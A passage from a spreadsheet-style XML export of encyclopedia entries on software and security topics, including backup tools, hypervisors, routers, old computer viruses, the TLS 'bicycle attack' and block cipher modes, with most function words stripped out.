    <t>catalogic (formerly backup express) enterprise-level data protection tool backs restores data applications variety operating systems. data protection, disaster recovery business continuity planning capabilities. catalogic protects physical virtual servers including vmware vsphere, supports many database applications, including oracle, sql, sharepoint, exchange. supports agent-based agent less backups. users backed version database something goes wrong primary version. managed single console catalog. this allows centralized control tape-based disk-based data protection jobs across heterogeneous operating systems. protect data centers, remote sites supports recovery protect data disk, tape cloud. used various recovery cases including file, application, bmr, spin backup images, recover physical servers, bring applications online snapshot based backups, used recover ransomware. supported applications according interface guide, contains interfaces following software database management systems: db2, lotus notes, microsoft exchange, novell groupwise, micro focus open enterprise services (oes), oracle, sap, sharepoint, sql-backtrack, server, sybase. oracle, provides cloning capabilities. microsoft exchange, server, oracle, provides read/write access recovery points. truncation, rollback time, point time recovery sql, granular recovery exchange, sharepoint available. storage media uses tape, tape library (jukebox), virtual tape library (vtl), disk (local, netapp, dell emc, data domain), disk-to-disk-to-tape, cloud backup target. back disk vstor netapp storage. structure infrastructure types components: master server controls backup management tasks, catalog, scheduling, execution, distributed processing. device server/advanced server/open storage server/vstor server handles backup media either tape disk. client node computer enterprise data backed considered client node. catalogic software history october 2013, syncsort sold data protection business investor group bedford venture partners windcrest partners. spun data protection business called catalogic software, company produces catalogic dpx.on june 2018, reported catalogic software taken equity stake european data protection company storware. also list backup software references syncsort data protection catalogic software, october 2014* catalogic 4.7.0 january 2021*</t>
  </si>
  <si>
    <t>BSoD</t>
  </si>
  <si>
    <t>Beyond Compare</t>
  </si>
  <si>
    <t>beyond compare proprietary data comparison utility. aside comparing files, program capable side-by-side comparison directories, sftp directories, dropbox directories, amazon directories, archives. available windows, linux operating systems. strength beyond compare configured difftool mergetool version control systems, git. reception april 2009 review, beyond compare awarded four five stars cnet. reviewers initially found user interface little overwhelming", "quickly hang it", using program little while. world writer michael desmond included program 2005 list utilities "trouble-free pc". highlighted program's "watch list" feature particular acclaim. beyond compare featured march 2005 issue windows magazine, "what's hot" section.scott mitchell, writing msdn magazine, identified program's comparison rules powerful feature. customizable rules control differences files flagged such. predefined rules included comparison common file types, source code, xml, html files.steve gibson recommended really cool...very smart windows-based source comparison tool". also comparison file comparison tools comparison client software references external links scooter software, maker beyond compare</t>
  </si>
  <si>
    <t>Bhyve</t>
  </si>
  <si>
    <t>bhyve (pronounced "bee hive", formerly written bhyve "bsd hypervisor") type-2 hypervisor initially written freebsd. also used number illumos based distributions including smartos, openindiana, omnios. port bhyve macos called xhyve also available. features bhyve supports virtualization several guest operating systems, including freebsd openbsd, netbsd, linux, illumos, dragonfly windows (windows vista later, windows server 2008 later). bhyve also supports uefi installations virtio emulated interfaces. windows virtual machines require virtio drivers stable operation. current development efforts widening support operating systems x86-64 architecture. support peripherals relies basic virtio drivers supports: extensible host controller interface (xhci) controllers, express (nvme) controllers, high definition audio controllers, framebuffer deviceattached server (video output), ahci/pci passthrough. since support peripherals incomplete, hardware-accelerated graphics available using passthrough. but, intel (and vgpus driver support) allow sharing device host.bhyve performs competitors lack memory ballooning accelerated graphics interface, bhyve modern codebase uses less resources. case freebsd resource management efficient. freebsd also known exemplary speeds; running bhyve freebsd advantages time-critical virtual appliances reducing time, especially disk network related loads. applications docker macos uses bhyve derivative called hyperkit. derived xhyve, port bhyve macos's hypervisor framework.iohyve freebsd command line utility create, store, manage, launch bhyve guests utilizing built freebsd features.vm-bhyve freebsd shell based, minimal dependency bhyve manager.bvcp freebsd lightweight, native, full featured interface managing virtual machines. other distributions clonos, freebsd based distribution virtual hosting platform appliance, primarily uses bhyve web-based management interface.mybee, freebsd based distribution managing cloud (bhyve) simplified api. references further reading external links bhyve(8) freebsd system manager's manual bhyve freebsd wiki</t>
  </si>
  <si>
    <t>Bicycle attack</t>
  </si>
  <si>
    <t>https bicycle attack refers method discovering password length packets encrypted tls/ssl protocols. preparation bicycle attack, attacker must load target page compute sizes headers request made given browser server. once attacker intercepts browser fingerprints victim's request, length password deduced subtracting known header lengths total length request. term first coined december 2015 guido vranken, wrote: "the name bicycle attack chosen conceptual similarity encryption hides content gift wrapping hides physical objects. attack relies heavily property stream-based ciphers size application data payloads directly known attacker inadvertently reveals information plaintext size; similar draped gift-wrapped bicycle still identifiable bicycle, cloaking like retains underlying shape. reason i've named attack make referring easier everyone." [emphasis added] bicycle attack makes brute-forcing passwords much easier, passwords known length need tested. demonstrates tls-encrypted http traffic completely obscure exact size content. also computer security references</t>
  </si>
  <si>
    <t>W3Perl</t>
  </si>
  <si>
    <t>w3perl free software logfile analyser, parse web/ftp/mail/cups/dhcp/ssh squid logfiles. most major logfile formats supported (web clf/eclf/neclf unix, iis/w3c microsoft mail postfix/sendmail/exim), well split/compressed files. "page tagging" counter also supported logfiles access. output spread html pages, graphics sortable table. stats single command line browser. features essential features like hosts, pages, scripts, countries, filetype, traffic, hourly, daily, weekly, monthly, referrer, user agent, error available along specific w3perl stats like real-time session stats. administration w3perl administration interface allows building configuration files interface. also manage configuration files, package updates, scripts, stats output. cross-platform availability written perl, w3perl installed operating system supports perl. such, installed unix, windows installer available windows licensing w3perl licensed gpl. security considerations running scripts administration interface restricted login/password. blocking referrer spam added based blacklist, file must updated regularly. real-time stats prevent overloading server. alternatives there free tools: analog written (and therefore fast) lacks features like session statistics. awstats large user base, powerful still lacks features w3perl. piwik scripts using mysql database. also data logging list analytics software server analytics analysis software references external links official website</t>
  </si>
  <si>
    <t>W32.Gammima.AG</t>
  </si>
  <si>
    <t>w32.gammima.ag computer worm detected nasa computers space aboard international space station (iss) august 2007. virus, gaming virus made steal login information net-based computer games, pose threat iss.the direct connection, data traffic travelling ground spacecraft scanned transmitted. thought virus might travelled flash drive taken space astronaut. worm copies drives following file: [drive letter]:\ntdelect.com references ryan singel (august 2008). "threat level: virus infects space station laptops (again)". wired.</t>
  </si>
  <si>
    <t>Vyatta</t>
  </si>
  <si>
    <t>vyatta software-based virtual router, virtual firewall products internet protocol networks (ipv4 ipv6). free download vyatta available since march 2006. system specialized debian-based linux distribution networking applications quagga, openvpn, many others. standardized management console, similar juniper junos cisco ios, addition web-based traditional linux system commands, provides configuration system applications. recent versions vyatta, web-based management interface supplied subscription edition. however, functionality available kvm, serial console ssh/telnet protocols. software runs standard x86-64 servers. vyatta also delivered virtual machine file provide (vrouter, vfirewall, vpn) functionality xen, vmware, kvm, rackspace, softlayer, amazon virtual cloud computing environments. october, 2012, vyatta also available amazon marketplace purchased service provide vpn, cloud bridging network functions users amazon's services. vyatta sells subscription edition includes functionality open source version well graphical user interface, access vyatta's restful api's, serial support, tacacs+, config sync, system image cloning, software updates, 24x7 phone email technical support, training. certification vyatta professional available. vyatta also offers professional services consulting engagements. vyatta system intended replacement cisco 1800 1000 series integrated services routers (isr) 5500 security appliances, strong emphasis cost flexibility inherent open source, linux-based system running commodity hardware vmware esxi, microsoft hyper-v, citrix xenserver, open source virtual environments. 2012, brocade communications systems acquired vyatta. april, 2013, brocade renamed product vyatta subscription edition (vse) brocade vyatta 5400 vrouter. latest commercial release brocade vrouter longer open-source based. june 2017, brocade sold vyatta software technology at&amp;t communications.in september 2021, at&amp;t supplier ciena corporation announced agreement acquire vyatta talent assets. vyatta core free community vyatta core software (vc) open source network operating system providing advanced ipv4 ipv6 routing, stateful firewalling, secure communication ipsec based well based openvpn.in october 2013, independent group started fork vyatta core name vyos.in march 2018, released open source project based proprietary brocade version vyatta name danos. release history references external links open source community vyatta distrowatch</t>
  </si>
  <si>
    <t>VyOS</t>
  </si>
  <si>
    <t>vyos open source network operating system based debian.vyos provides free routing platform competes directly commercially available solutions well known network providers. because vyos standard amd64 systems, able used router firewall platform cloud deployments. history after brocade communications stopped development vyatta core edition vyatta routing software, small group enthusiasts 2013 took last community edition, worked building open source fork live place life features (ipv4 ipv6), ospf v3), ripng, policy-based routing. ipsec, vti, vxlan, l2tpv3, l2tp/ipsec pptp servers, tunnel interfaces (gre, ipip, sit), openvpn client, server, site-to-site modes, wireguard. stateful firewall, zone-based firewall, types source destination (one one, many, many many). dhcp dhcpv6 server relay, ipv6 forwarding, tftp server, proxy, pppoe access concentrator, netflow/sflow sensor, qos. vrrp ipv4 ipv6, ability execute custom health checks transition scripts; ecmp, stateful load balancing. built-in versioning. releases vyos version 1.0.0 (hydrogen) released december 2013. october 2014, version 1.1.0 (helium) released. versions released thus based debian (squeeze), available 32-bit images 64-bit images physical virtual machines.on january 2019, version 1.2.0 (crux) released. version 1.2.0 based debian (jessie). while version named elements, naming scheme based constellations used version 1.2. release history vmware support vyos image vmware released february 2014 maintenance release. allows convenient setup vyos vmware platform includes vmware tools paravirtual drivers. image downloaded standard download site amazon support starting version 1.0.2, amazon customers select vyos image. (deprecated, removed february 2018) starting version 1.1.7, customers marketplace vyos amistarting version 1.2.0, customers deploy marketplace this offering comes support azure support starting version 1.2.0, azure customers vyos azure also list router firewall distributions references external links official website vyos distrowatch</t>
  </si>
  <si>
    <t>Vx32</t>
  </si>
  <si>
    <t>vx32 virtual extension environment application-level virtual machine implemented ordinary user-mode library designed native code. applications link vx32 order create safe, os-independent execution environments, untrusted plug-ins extensions written language compiles code. from host processor's viewpoint, plug-ins running vx32 virtual machine monitor context application process itself, vx32 library uses dynamic recompilation prevent "guest" plug-in code accessing memory jumping instructions outside designated sandbox. vx32 library redirects system calls plug-in makes application rather host operating system, thereby giving application exclusive control security environment plug-in code executes. vx32 thus provides application extension facility comparable function java virtual machine (jvm) common language runtime (clr), less overhead ability code written language, safe unsafe. vx32's primary disadvantage difficult make non-x86 host processors. criticism there disadvantages proposed critics vx32: vx32 closely tied ia-32 instruction set, makes difficult non-x86 architectures ia-32e (amd64) mode cannot used guests (the host still 64-bit mode), segmentation inherent vx32's design external links vx32 virtual extension environment vx32: lightweight user-level sandboxing paper presented usenix 2008 port plan bell labs vx32. vx32 win32</t>
  </si>
  <si>
    <t>Bliss (virus)</t>
  </si>
  <si>
    <t>bliss computer virus, introduced 1997, aims infect linux systems. when executed, attempts attach linux executable files, regular users access. case alpha version, prevents executables running, users notice immediately. although probably intended prove linux infected, propagate effectively structure linux's user privilege system. bliss virus never became widespread, remains chiefly research curiosity. after staog virus second known linux virus.when bliss virus released, antivirus software vendors linux distributions released security advisories notify users potential risks.debian still lists vulnerable bliss virus. however, requirement infection occur root user, risk listed minimal. also linux malware references external links bliss, linux "virus"</t>
  </si>
  <si>
    <t>Block cipher mode of operation</t>
  </si>
  <si>
    <t>cryptography, block cipher mode operation algorithm uses block cipher provide information security confidentiality authenticity. block cipher suitable secure cryptographic transformation (encryption decryption) fixed-length group bits called block. mode operation describes repeatedly apply cipher's single-block operation securely transform amounts data larger block.most modes require unique binary sequence, often called initialization vector (iv), encryption operation. non-repeating and, modes, random well. initialization vector used ensure distinct ciphertexts produced even plaintext encrypted multiple times independently key. block ciphers capable operating block size, transformation block size always fixed. block cipher modes operate whole blocks require last part data padded full block smaller current block size. there are, however, modes require padding effectively block cipher stream cipher. historically, encryption modes studied extensively regard error propagation properties various scenarios data modification. later development regarded integrity protection entirely separate cryptographic goal. some modern modes operation combine confidentiality authenticity efficient way, known authenticated encryption modes. history standardization earliest modes operation, ecb, cbc, ofb, (see all), date back 1981 specified fips modes operation. 2001, national institute standards technology (nist) revised list approved modes operation including block cipher adding mode sp800-38a, recommendation block cipher modes operation. finally, january, 2010, nist added xts-aes sp800-38e, recommendation block cipher modes operation: xts-aes mode confidentiality storage devices. other confidentiality modes exist approved nist. example, ciphertext stealing mode available many popular cryptographic libraries. block cipher modes ecb, cbc, ofb, cfb, ctr, provide confidentiality, protect accidental modification malicious tampering. modification tampering detected separate message authentication code cbc-mac, digital signature. cryptographic community recognized need dedicated integrity assurances nist responded hmac, cmac, gmac. hmac approved 2002 fips 198, keyed-hash message authentication code (hmac), cmac released 2005 sp800-38b, recommendation block cipher modes operation: cmac mode authentication, gmac formalized 2007 sp800-38d, recommendation block cipher modes operation: galois/counter mode (gcm) gmac. cryptographic community observed compositing (combining) confidentiality mode authenticity mode could difficult error prone. they therefore began supply modes combined confidentiality data integrity single cryptographic primitive encryption algorithm). these combined modes referred authenticated encryption, "authenc". examples modes (sp800-38c), (sp800-38d), cwc, eax, iapm, ocb. modes operation defined number national internationally recognized standards bodies. notable standards organizations include nist, (with iso/iec 10116), iec, ieee, ansi, ietf. initialization vector (iv) initialization vector (iv) starting variable (sv) block bits used several modes randomize encryption hence produce distinct ciphertexts even plaintext encrypted multiple times, without need slower re-keying process.an initialization vector different security requirements key, usually need secret. block cipher modes important initialization vector never reused key, i.e. must cryptographic nonce. many block cipher modes stronger requirements, must random pseudorandom. some block ciphers particular problems certain initialization vectors, zero generating encryption (for keys). recommended review relevant requirements particular block cipher mode relevant specification, example sp800-38a. cfb, reusing leaks information first block plaintext, common prefix shared messages. ctr, reusing causes bitstream re-use, breaks security. this seen modes effectively create bitstream xored plaintext, bitstream dependent only. mode, must unpredictable (random pseudorandom) encryption time; particular, (previously) common practice re-using last ciphertext block message next message insecure (for example, method used 2.0). attacker knows previous block ciphertext) next plaintext specified, check guess plaintext block encrypted (this known attack).for keys all-zero initialization vector generate block cipher modes (cfb-8, ofb-8) internal state stuck all-zero. cfb-8, all-zero all-zero plaintext, causes 1/256 keys generate encryption, plaintext returned ciphertext. ofb-8, using zero initialization vector generate encryption 1/256 keys. ofb-8 encryption returns plaintext unencrypted affected keys. some modes (such aes-siv aes-gcm-siv) built nonce-misuse resistant, i.e. resilient scenarios randomness generation faulty control attacker. synthetic initialization vectors (siv) synthesize internal running pseudo-random function (prf) construction called input (additional data plaintext), preventing external data directly controlling external nonces feed additional data field. aes-gcm-sivs synthesize internal running polyval galois mode authentication input (additional data plaintext), followed operation. padding block cipher works units fixed size (known block size), messages come variety lengths. modes (namely cbc) require final block padded encryption. several padding schemes exist. simplest null bytes plaintext bring length multiple block size, care must taken original length plaintext recovered; trivial, example, plaintext style string contains null bytes except end. slightly complex original method, single bit, followed enough zero bits fill block; message ends block boundary, whole padding block added. most sophisticated cbc-specific schemes ciphertext stealing residual block termination, cause extra ciphertext, expense additional complexity. schneier ferguson suggest possibilities, simple: append byte value (hex 80), followed many zero bytes needed fill last block, last block bytes value cfb, modes require special measures handle messages whose lengths multiples block size, since modes work xoring plaintext output block cipher. last partial block plaintext xored first bytes last keystream block, producing final ciphertext block size final partial plaintext block. this characteristic stream ciphers makes suitable applications require encrypted ciphertext data size original plaintext data, applications transmit data streaming form inconvenient padding bytes. common modes authenticated encryption additional data (aead) modes number modes operation designed combine secrecy authentication single cryptographic primitive. examples modes extended cipher block chaining (xcbc), integrity-aware cipher block chaining (iacbc), integrity-aware parallelizable mode (iapm), ocb, eax, cwc, ccm, gcm. authenticated encryption modes classified single-pass modes double-pass modes. some single-pass authenticated encryption algorithms, mode, encumbered patents, others specifically designed released avoid encumberment. addition, modes also allow authentication unencrypted associated data, called aead (authenticated encryption associated data) schemes. example, mode double-pass aead scheme mode single-pass. galois/counter (gcm) galois/counter mode (gcm) combines well-known counter mode encryption galois mode authentication. feature ease parallel computation galois field multiplication used authentication. this feature permits higher throughput encryption algorithms. defined block ciphers block size bits. galois message authentication code (gmac) authentication-only variant form incremental message authentication code. both gmac accept initialization vectors arbitrary length. take full advantage parallel processing implementing make efficient instruction pipeline hardware pipeline. mode operation incurs pipeline stalls hamper efficiency performance. like ctr, blocks numbered sequentially, block number combined encrypted block cipher usually aes. result encryption xored plaintext produce ciphertext. like counter modes, essentially stream cipher, essential different used stream encrypted. ciphertext blocks considered coefficients polynomial evaluated key-dependent point using finite field arithmetic. result encrypted, producing authentication used verify integrity data. encrypted text contains ciphertext, authentication tag. counter cipher block chaining message authentication code (ccm) counter cipher block chaining message authentication code (counter cbc-mac; ccm) authenticated encryption algorithm designed provide authentication confidentiality. mode defined block ciphers block length bits. synthetic initialization vector (siv) synthetic initialization vector (siv) nonce-misuse resistant block cipher mode. synthesizes internal using pseudorandom function s2v. keyed hash based cmac, input function additional authenticated data (zero, many fields supported) plaintext authentication (k1).siv encrypts output plaintext using aes-ctr, keyed encryption (k2). support external nonce-based authenticated encryption, case authenticated data fields utilized purpose. rfc5297 specifies interoperability purposes last authenticated data field used external nonce. owing keys, authentication encryption naming schemes aead-variants lead confusion; example aead_aes_siv_cmac_256 refers aes-siv aes-128 keys aes-256. aes-gcm-siv aes-gcm-siv mode operation advanced encryption standard provides similar performance galois/counter mode well misuse resistance event reuse cryptographic nonce. construction defined 8452.aes-gcm-siv synthesizes internal derives hash additional authenticated data plaintext using polyval galois hash function. hash encrypted aes-key, used authentication aes-ctr initialization vector. aes-gcm-siv improvement similarly named algorithm gcm-siv, small changes (e.g. aes-ctr initialized), yields practical benefits security "this addition allows encrypting messages key, compared significant limitation messages allowed gcm-siv." confidentiality modes many modes operation defined. some described below. purpose cipher modes mask patterns exist encrypted data, illustrated description weakness ecb. different cipher modes mask patterns cascading outputs cipher block globally deterministic variables subsequent cipher block. inputs listed modes summarized following table: note: g(i) deterministic function, often identity function. electronic codebook (ecb) simplest (and used anymore) encryption modes electronic codebook (ecb) mode (named conventional physical codebooks). message divided blocks, block encrypted separately. disadvantage method lack diffusion. because encrypts identical plaintext blocks identical ciphertext blocks, hide data patterns well. recommended cryptographic protocols.a striking example degree leave plaintext data patterns ciphertext seen mode used encrypt bitmap image uses large areas uniform color. while color individual pixel encrypted, overall image still discerned, pattern identically colored pixels original remains encrypted version. mode also make protocols without integrity protection even susceptible replay attacks, since block gets decrypted exactly way. cipher block chaining (cbc) ehrsam, meyer, smith tuchman invented cipher block chaining (cbc) mode operation 1976. mode, block plaintext xored previous ciphertext block encrypted. this way, ciphertext block depends plaintext blocks processed point. make message unique, initialization vector must used first block. first block index mathematical formula encryption {\displaystyle c_{i}=e_{k}(p_{i}\oplus c_{i-1}),} {\displaystyle c_{0}=iv,} mathematical formula decryption {\displaystyle p_{i}=d_{k}(c_{i})\oplus c_{i-1},} {\displaystyle c_{0}=iv.} example commonly used mode operation. main drawbacks encryption sequential (i.e., cannot parallelized), message must padded multiple cipher block size. handle last issue method known ciphertext stealing. note one-bit change plaintext initialization vector (iv) affects following ciphertext blocks. decrypting incorrect causes first block plaintext corrupt subsequent plaintext blocks correct. this block xored ciphertext previous block, plaintext, need decrypt previous block using decryption current one. this means plaintext block recovered adjacent blocks ciphertext. consequence, decryption parallelized. note one-bit change ciphertext causes complete corruption corresponding block plaintext, inverts corresponding following block plaintext, rest blocks remain intact. this peculiarity exploited different padding oracle attacks, poodle. explicit initialization vectors takes advantage property prepending single random block plaintext. encryption done normal, except need communicated decryption routine. whatever decryption uses, random block "corrupted". safely discarded rest decryption original plaintext. propagating cipher block chaining (pcbc) propagating cipher block chaining plaintext cipher-block chaining mode designed cause small changes ciphertext propagate indefinitely decrypting, well encrypting. pcbc mode, block plaintext xored previous plaintext block previous ciphertext block encrypted. like mode, initialization vector used first block. unlike cbc, decrypting pcbc incorrect (initialization vector) causes blocks plaintext corrupt. encryption decryption algorithms follows: {\displaystyle c_{i}=e_{k}(p_{i}\oplus p_{i-1}\oplus c_{i-1}),p_{0}\oplus c_{0}=iv,} {\displaystyle p_{i}=d_{k}(c_{i})\oplus p_{i-1}\oplus c_{i-1},p_{0}\oplus c_{0}=iv.} pcbc used kerberos waste, notably, otherwise common. message encrypted pcbc mode, adjacent ciphertext blocks exchanged, affect decryption subsequent blocks. reason, pcbc used kerberos cipher feedback (cfb) full-block cipher feedback (cfb) mode, simplest form uses entire output block cipher. variation, similar cbc, makes block cipher self-synchronizing stream cipher. decryption variation almost identical encryption performed reverse: otherwise {\displaystyle {\begin{aligned}c_{i}&amp;={\begin{cases}{\text{iv}},&amp;i=0\\e_{k}(c_{i-1})\oplus p_{i},&amp;{\text{otherwise}}\end{cases}}\\p_{i}&amp;=e_{k}(c_{i-1})\oplus c_{i},\end{aligned}}} cfb-1, cfb-8, cfb-64, cfb-128, etc. nist sp800-38a defines bit-width. mode also requires integer parameter, denoted specification mode below, plaintext segment (pj) ciphertext segment (cj) consists bits. value sometimes incorporated name mode, e.g., 1-bit mode, 8-bit mode, 64-bit mode, 128-bit mode. these modes truncate output underlying block cipher. {\displaystyle i_{0}={\text{iv}}.} {\displaystyle i_{i}={\big (}(i_{i-1}\ll s)+c_{i}{\big )}{\bmod {2}}^{b},} {\displaystyle c_{i}=\operatorname {msb} _{s}{\big (}e_{k}(i_{i-1}){\big )}\oplus p_{i},} {\displaystyle p_{i}=\operatorname {msb} _{s}{\big (}e_{k}(i_{i-1}){\big )}\oplus c_{i},} cfb-1 considered self synchronizing resilient loss ciphertext; "when 1-bit mode used, synchronization automatically restored positions inserted deleted bit. values mode, confidentiality modes recommendation, synchronization must restored externally." (nist sp800-38a). i.e. 1-bit loss 128-bit-wide block cipher like render invalid bits emitting valid bits. also self synchronize special cases specified. example, change cfb-128 underlying block cipher, re-synchronize blocks. (however, cfb-128 etc. handle loss gracefully; one-bit loss cause decryptor lose alignment encryptor) compared modes like mode, changes plaintext propagate forever ciphertext, encryption cannot parallelized. also like cbc, decryption parallelized. cfb, share advantages mode: block cipher ever used encrypting direction, message need padded multiple cipher block size (though ciphertext stealing also used mode make padding unnecessary). output feedback (ofb) output feedback (ofb) mode makes block cipher synchronous stream cipher. generates keystream blocks, xored plaintext blocks ciphertext. just stream ciphers, flipping ciphertext produces flipped plaintext location. this property allows many error-correcting codes function normally even applied encryption. because symmetry operation, encryption decryption exactly same: {\displaystyle c_{j}=p_{j}\oplus o_{j},} {\displaystyle p_{j}=c_{j}\oplus o_{j},} {\displaystyle o_{j}=e_{k}(i_{j}),} {\displaystyle i_{j}=o_{j-1},} {\displaystyle i_{0}={\text{iv}}.} each output feedback block cipher operation depends previous ones, cannot performed parallel. however, plaintext ciphertext used final xor, block cipher operations performed advance, allowing final step performed parallel plaintext ciphertext available. possible obtain mode keystream using mode constant string zeroes input. this useful, allows usage fast hardware implementations mode mode encryption. using mode partial block feedback like mode reduces average cycle length factor more. mathematical model proposed davies parkin substantiated experimental results showed full feedback average cycle length near obtainable maximum achieved. reason, support truncated feedback removed specification ofb. counter (ctr) note: mode (cm) also known integer counter mode (icm) segmented integer counter (sic) mode.like ofb, counter mode turns block cipher stream cipher. generates next keystream block encrypting successive values "counter". counter function produces sequence guaranteed repeat long time, although actual increment-by-one counter simplest popular. usage simple deterministic input function used controversial; critics argued "deliberately exposing cryptosystem known systematic input represents unnecessary risk". however, today mode widely accepted, problems considered weakness underlying block cipher, expected secure regardless systemic bias input. along cbc, mode block cipher modes recommended niels ferguson bruce schneier.ctr mode introduced whitfield diffie martin hellman 1979.ctr mode similar characteristics ofb, also allows random-access property decryption. mode well suited operate multi-processor machine, blocks encrypted parallel. furthermore, suffer short-cycle problem affect ofb.if iv/nonce random, combined counter using invertible operation (concatenation, addition, xor) produce actual unique counter block encryption. case non-random nonce (such packet counter), nonce counter concatenated (e.g., storing nonce upper bits counter lower bits 128-bit counter block). simply adding xoring nonce counter single value would break security chosen-plaintext attack many cases, since attacker able manipulate entire iv–counter pair cause collision. once attacker controls iv–counter pair plaintext, ciphertext known plaintext would yield value that, xored ciphertext block sharing iv–counter pair, would decrypt block.note nonce diagram equivalent initialization vector (iv) diagrams. however, offset/location information corrupt, impossible partially recover data dependence byte offset. error propagation "error propagation" properties describe decryption behaves errors, i.e. error cascades different decrypted bits. errors occur intentionally attacks randomly transmission errors. random errors occur independently position expected probability specific errors occur position(s) original error(s).specific errors stream cipher modes (ofb, ctr, etc.) trivial. they affect specific intended. specific errors complex modes (e.g. cbc): adaptive chosen-ciphertext attack intelligently combine many different specific errors break cipher mode. padding oracle attack, decrypted attack guessing encryption secrets based error responses. padding oracle attack variant "cbc-r" (cbc reverse) lets attacker construct valid message.for modern authenticated encryption (aead) protocols message authentication codes chained mac-then-encrypt order, error completely abort decryption must generate specific errors decryptor. i.e. decryption succeeded, error. error propagation less important subject modern cipher modes traditional confidentiality-only modes. (source: sp800-38a table d.2: summary effect errors decryption) might observed, example, one-block error transmitted ciphertext would result one-block error reconstructed plaintext mode encryption, mode error would affect blocks. some felt resilience desirable face random errors (e.g., line noise), others argued error correcting increased scope attackers maliciously tamper message. however, proper integrity protection used, error result (with high probability) entire message rejected. resistance random error desirable, error-correcting codes applied ciphertext transmission. other modes cryptographic primitives many modes operation block ciphers suggested. some accepted, fully described (even standardized), use. others found insecure, never used. still others categorize confidentiality, authenticity, authenticated encryption example feedback mode davies–meyer hashing. nist maintains list proposed modes block ciphers modes development.disk encryption often uses special purpose modes specifically designed application. tweakable narrow-block encryption modes (lrw, xex, xts) wide-block encryption modes (cmc eme) designed securely encrypt sectors disk (see disk encryption theory). many modes initialization vector (iv) which, depending mode, requirements used nonce) unpredictable ahead publication, etc. reusing ctr, mode results xoring keystream plaintexts, clear misuse stream, catastrophic loss security. deterministic authenticated encryption modes nist wrap algorithm (rfc 5297) aead mode require input, return ciphertext authentication every time given plaintext key. other misuse-resistant modes aes-gcm-siv benefit input, example maximum amount data safely encrypted key, failing catastrophically used multiple times. block ciphers also used cryptographic protocols. they generally used modes operation similar block modes described here. protocols, cryptographically secure, care must taken design modes operation correctly. there several schemes block cipher build cryptographic hash function. one-way compression function descriptions several methods. cryptographically secure pseudorandom number generators (csprngs) also built using block ciphers. message authentication codes (macs) often built block ciphers. cbc-mac, omac pmac examples. also disk encryption message authentication code authenticated encryption one-way compression function references</t>
  </si>
  <si>
    <t>Block cipher</t>
  </si>
  <si>
    <t>cryptography, block cipher deterministic algorithm operating fixed-length groups bits, called blocks. they specified elementary components design many cryptographic protocols widely used encrypt large amounts data, including data exchange protocols. uses blocks unvarying transformation. even secure block cipher suitable encryption single block data time, using fixed key. multitude modes operation designed allow repeated secure achieve security goals confidentiality authenticity. however, block ciphers also feature building blocks cryptographic protocols, universal hash functions pseudorandom number generators. definition block cipher consists paired algorithms, encryption, decryption, both algorithms accept inputs: input block size bits size bits; yield n-bit output block. decryption algorithm defined inverse function encryption, i.e., e−1. more formally, block cipher specified encryption function {\displaystyle e_{k}(p):=e(k,p):\{0,1\}^{k}\times \{0,1\}^{n}\rightarrow \{0,1\}^{n},} takes input length (called size), string length (called block size), returns string bits. called plaintext, termed ciphertext. function ek(p) required invertible mapping {0,1}n. inverse defined function {\displaystyle e_{k}^{-1}(c):=d_{k}(c)=d(k,c):\{0,1\}^{k}\times \{0,1\}^{n}\rightarrow \{0,1\}^{n},} taking ciphertext return plaintext value {\displaystyle \forall k:d_{k}(e_{k}(p))=p.} example, block cipher encryption algorithm might take 128-bit block plaintext input, output corresponding 128-bit block ciphertext. exact transformation controlled using second input secret key. decryption similar: decryption algorithm takes, example, 128-bit block ciphertext together secret key, yields original 128-bit block plain text.for permutation bijective mapping) input blocks. each selects permutation {\displaystyle (2^{n})!} possible permutations. history modern design block ciphers based concept iterated product cipher. seminal 1949 publication, communication theory secrecy systems, claude shannon analyzed product ciphers suggested means effectively improving security combining simple operations substitutions permutations. iterated product ciphers carry encryption multiple rounds, uses different subkey derived original key. widespread implementation ciphers, named feistel network horst feistel, notably implemented cipher. many realizations block ciphers, aes, classified substitution–permutation networks.the root cryptographic block formats used within payment card industry data security standard (pci dss) american national standards institute (ansi) standards lies atalla block (akb), innovation atalla box, first hardware security module (hsm). developed 1972 mohamed atalla, founder atalla corporation (now utimaco atalla), released 1973. block, required securely interchange symmetric keys pins actors banking industry. this secure interchange performed using format. atalla protected networks operation 1998, atalla products still secure majority world's transactions 2014.the publication cipher united states national bureau standards (subsequently u.s. national institute standards technology, nist) 1977 fundamental public understanding modern block cipher design. also influenced academic development cryptanalytic attacks. both differential linear cryptanalysis arose studies design. 2016 palette attack techniques block cipher must secure, addition robust brute-force attacks. design iterated block ciphers most block cipher algorithms classified iterated block ciphers means transform fixed-size blocks plaintext identically sized blocks ciphertext, repeated application invertible transformation known round function, iteration referred round.usually, round function takes different round keys second input, derived original key: {\displaystyle m_{i}=r_{k_{i}}(m_{i-1})} {\displaystyle m_{0}} plaintext {\displaystyle m_{r}} ciphertext, number rounds. frequently, whitening used addition this. beginning end, data modified material (often xor, simple arithmetic operations like adding subtracting also used): {\displaystyle m_{0}=m\oplus k_{0}} {\displaystyle m_{i}=r_{k_{i}}(m_{i-1})\;;\;i=1\dots {\displaystyle c=m_{r}\oplus k_{r+1}} given standard iterated block cipher design schemes, fairly easy construct block cipher cryptographically secure, simply using large number rounds. however, make cipher inefficient. thus, efficiency important additional design criterion professional ciphers. further, good block cipher designed avoid side-channel attacks, branch prediction input-dependent memory accesses might leak secret data cache state execution time. addition, cipher concise, small hardware software implementations. finally, cipher easily cryptanalyzable, shown many rounds cipher needs reduced existing cryptographic attacks would work and, conversely, shown number actual rounds large enough protect them. substitution–permutation networks important type iterated block cipher known substitution–permutation network (spn) takes block plaintext inputs, applies several alternating rounds consisting substitution stage followed permutation stage—to produce block ciphertext output. non-linear substitution stage mixes bits plaintext, creating shannon's confusion. linear permutation stage dissipates redundancies, creating diffusion.a substitution (s-box) substitutes small block input bits another block output bits. this substitution must one-to-one, ensure invertibility (hence decryption). secure s-box property changing input change half output bits average, exhibiting known avalanche effect—i.e. property output depend every input bit.a permutation (p-box) permutation bits: takes outputs s-boxes round, permutes bits, feeds s-boxes next round. good p-box property output bits s-box distributed many s-box inputs possible.at round, round (obtained simple operations, instance, using s-boxes p-boxes) combined using group operation, typically xor.decryption done simply reversing process (using inverses s-boxes p-boxes applying round keys reversed order). feistel ciphers feistel cipher, block plain text encrypted split equal-sized halves. round function applied half, using subkey, output xored half. halves swapped.let {\displaystyle {\rm {f}}} round function {\displaystyle k_{0},k_{1},\ldots ,k_{n}} sub-keys rounds {\displaystyle 0,1,\ldots respectively. then basic operation follows:split plaintext block equal pieces, {\displaystyle l_{0}} {\displaystyle r_{0}} round {\displaystyle i=0,1,\dots compute 